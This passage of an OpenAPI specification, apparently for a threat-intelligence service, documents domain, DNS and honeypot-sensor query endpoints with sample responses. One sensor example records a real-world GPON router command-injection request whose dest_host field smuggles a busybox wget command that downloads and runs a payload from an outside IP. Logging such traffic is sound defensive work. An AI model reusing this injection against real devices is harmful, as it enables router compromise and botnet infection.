records.\n\n **Nota**: Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: target description: "target IP address, supports IPV4 or IPV6." schema: type: string required: true - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Domains results" content: application/json: example: query: 'A:"8.8.8.8"' page: 1 pagesize: 100 total: 726 events: - A: - 8.8.8.8 updated_at: '2018-06-08T20:51:30.676063' NS: - ns1058.ui-dns.org - ns1062.ui-dns.com - ns1068.ui-dns.biz - ns1096.ui-dns.de domain: aeroway.co.uk root: aeroway.co.uk MX: - mx00.1and1.co.uk - mx01.1and1.co.uk - A: - 8.8.8.8 updated_at: '2018-06-08T20:53:30.348620' NS: - f1g1ns1.dnspod.net - f1g1ns2.dnspod.net domain: 84168800.com root: 84168800.com - A: - 8.8.8.8 updated_at: '2018-06-08T20:53:32.450310' NS: - f1g1ns1.dnspod.net - f1g1ns2.dnspod.net domain: 84169911.com root: 84169911.com - A: - 8.8.8.8 updated_at: '2018-06-08T20:53:32.508761' NS: - f1g1ns1.dnspod.net - f1g1ns2.dnspod.net domain: 84163311.com root: 84163311.com - A: - 8.8.8.8 updated_at: '2018-06-08T20:53:32.540496' NS: - f1g1ns1.dnspod.net - f1g1ns2.dnspod.net domain: 00888416.com root: 00888416.com '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/domains/search: get: tags: - Domain summary: "" description: "List of Domains/DNS data based on a Query. Can be used with specific parameters and/or full-text search. Possible types of records currently available:\n\n -A, AAAA, NS, MX, CNAME, TXT" security: - Token: [] parameters: - in: query name: query description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events" required: true schema: type: string - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Domains results" content: application/json: example: query: 'A:127.0.0.1' page: 1 pagesize: 100 total: 176685 events: - A: - 127.0.0.1 updated_at: '2018-06-08T20:32:57.002881' NS: - ns3jkl.name.com - ns4qxz.name.com - ns2knz.name.com - ns1ksz.name.com domain: heathynurseway.co.uk root: heathynurseway.co.uk MX: - mail.emailgoodbye.me - A: - 127.0.0.1 updated_at: '2018-06-08T20:29:19.612334' NS: - ns1.antagus.de - ns2.antagus.de domain: vit.press root: vit.press MX: - mail.vit.press '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/sensors/ip/{target}: get: tags: - Sensor summary: "" description: "Details about an Scanner. List of recent events form the specified host, including details of scanned ports, payloads and tags.\n\n **Note**: Querying CIDRs is available for paid subscriptions only. When using CIDR, the number of credits that will be spent correspond to the number of targets that returned results. Example: a request for a /24 (256 targets) in which only 200 targets have results, will decrement 200 credits." security: - Token: [] parameters: - in: path name: target description: "target IP address or CIDR up to /24" schema: type: string required: true responses: '200': description: "Return Sensor data" content: application/json: example: query: xxx.xxx.xxx.xxx total: 1 targets_found: 1 events: - port: 443 results: - target: port: 443 protocol: tcp origin: ts: 1549500839739 type: sinkhole ip: xxx.xxx.xxx.xxx rdns: xxx.xxx.xxx.example.com data: payload: 'POST /GponForm/diag_Form?style/ HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://185.244.25.98/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0' extra: http: method: POST path: /GponForm/diag_Form?style/ version: '1.1' headers: user-agent: 'Hello, World' accept: '*/*' accept-encoding: 'gzip, deflate' content-type: application/x-www-form-urlencoded tags: - HTTP_SCANNER '@timestamp': '2019-02-07T00:54:00.422Z' '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/sensors/search: get: tags: - Sensor summary: "" description: "Events based on a Query. List of recent events for the given query, including details of scanned ports, payloads and tags. Can be used with specific parameters and/or full-text search." security: - Token: [] parameters: - in: query name: query description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events. See [Search Parameters](https://docs.binaryedge.io/sensors-search/) for details on what parameters can be used." required: true schema: type: string - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Domains results" content: application/json: example: query: 'tags:ssh_scanner' page: 1 pagesize: 20 total: 1117979 events: - data: payload: SSH-2.0-PUTTY\r\n extra: ssh: description: SSH-2.0-PUTTY tags: - SSH_SCANNER target: port: 22 protocol: tcp origin: ip: 218.92.1.153 type: sinkhole ts: 1549625590653 asn: 4134 - target: port: 22 protocol: tcp data: payload: '\x00\x00\x02\x84\x07\x14t\x85\x97.Sf\x88\xa3\x1a\x7f\xf7:ZzG\\\x00\x00\x00Ydiffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1\x00\x00\x00\x0fssh-rsa,ssh-dss\x00\x00\x00\x92aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc\x00\x00\x00\x92aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc\x00\x00\x00Uhmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com\x00\x00\x00Uhmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com\x00\x00\x00\x04none\x00\x00\x00\x04none\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=@\x8d71\xc9&' extra: ssh: hassh: 92674389fa1e47a27ddd8d9b63ecd42b hassh_algorithms: 'diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none' tags: - SSH_SCANNER origin: ip: 58.242.83.31 type: sinkhole ts: 1549625585310 asn: 4837 - ...: null '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/sensors/search/stats: get: tags: - Sensor summary: "" description: "Statistics of recent events for the given query. Can be used with specific parameters and/or full-text search." security: - Token: [] parameters: - in: query name: query schema: type: string description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events. See [Search Parameters](https://docs.binaryedge.io/search/) for details on what parameters can be used." required: true - in: query name: type schema: type: string description: "Type of statistic we want to obtain. Possible types include:\n\n - ports, tags, countries, asn, ips, payloads, http_path, rdns." required: true - in: query name: days description: "Number of days to get the stats for. For example days=1 for the last day of data." schema: type: integer minimum: 1 maximum: 60 default: 60 - in: query name: order description: "Whether to sort descendently or ascendently to get the top." schema: type: string enum: ["desc", "asc"] responses: '200': description: "Return stats results." content: application/json: example: - key: 22/tcp doc_count: 1102752 - key: 2222/tcp doc_count: 8149 - key: 222/tcp doc_count: 1970 - key: 4000/tcp doc_count: 1962 - key: 23/tcp doc_count: 1552 '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/sensors/tag/{tag}: get: tags: - Sensor summary: "" description: "Get a list of IPs that have been associated with a specific TAG." security: - Token: [] parameters: - in: path name: tag schema: type: string description: "[String] Tag you want to get the list of IPs related to. **example**: MALICIOUS" required: true - in: query name: days description: "[Integer] Query Param: Number of days to get the stats for. For example days=1 for the last day of data." schema: type: integer minimum: 1 maximum: 60 default: 1 responses: '200': description: "Return stats results." content: application/json: example: - 1.34.221.87 - 1.160.38.189 - 1.160.39.129 - 1.160.91.241 - 1.160.130.56 - 1.160.160.98 - 1.161.118.167 '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' components: securitySchemes: Token: type: apiKey in: header name: X-KEY responses: HTTPStatusMessage400: description: "Bad Parameter" content: application/json: schema: type: object properties: status: type: integer title: type: string message: type: string example: status: "400" title: "Bad Request" description: "Bad Parameter. Please review your query and try again." HTTPStatusMessage401: description: "Could not validate token" content: application/json: schema: type: object properties: status: type: integer title: type: string message: type: string example: status: "401" title: "Unauthorized" description: "Could not validate token. Please review your token and try again." HTTPStatusMessage403: description: "Forbidden" content: application/json: schema: type: object properties: status: type: integer title: type: string message: type: string example: status: "403" title: "Forbidden" message: "Your plan doesn't allow you to access this resource." HTTPStatusMessage404: description: 'Page not found' content: application/json: schema: type: object properties: status: type: integer title: type: string message: type: string example: status: "404" title: "Not Found" message: "Page not found."